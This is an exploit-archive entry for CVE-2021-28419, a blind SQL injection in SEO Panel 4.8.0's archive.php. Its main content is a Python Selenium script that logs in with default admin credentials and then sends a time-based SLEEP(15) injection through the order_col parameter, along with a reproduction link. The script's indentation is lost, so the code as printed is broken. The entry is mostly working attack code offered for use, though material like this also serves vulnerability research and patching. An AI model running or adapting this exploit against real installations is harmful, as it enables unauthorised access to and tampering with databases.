SEO Panel version 4.8.0 remote blind SQL injection exploit. Original discovery in this version is attributed to Piyush Patil in February of 2021.
4b18d3433a071c4d3f98f08f8abcd113
# Exploit Title: blind SQL injection on archive.php of SEO Panel 4.8.0
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 04.25.2021
# Vendor: https://www.seopanel.org/
# Link: https://www.seopanel.org/spdownload/4.8.0
# CVE: CVE-2021-28419
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-28419
from selenium import webdriver
import time
#enter the link to the website you want to automate login.
website_link="http://192.168.1.3/seopanel/login.php"
#enter your login username
username="spadmin"
#enter your login password
password="spadmin"
#enter the element for username input field
element_for_username="userName"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="login"
browser = webdriver.Chrome()
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit
browser.get(("
http://192.168.1.3/seopanel/archive.php?from_time=2021-04-25&order_col=(SELECT
7397 FROM
(SELECT(SLEEP(15)))nu11secur1ty)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id=1"))
print("payload is deployed MySQL is not responding correctly...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")
---------------------------------
# Exploit Title: blind SQL injection on archive.php of SEO Panel 4.8.0
# Date: 04.25.2021
# Exploit Authotr idea: @nu11secur1ty, xoffense
# Exploit Debugging: nu11secur1ty
# Vendor Homepage: https://www.seopanel.org/
# Software Link: https://www.seopanel.org/spdownload/4.8.0
# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-28419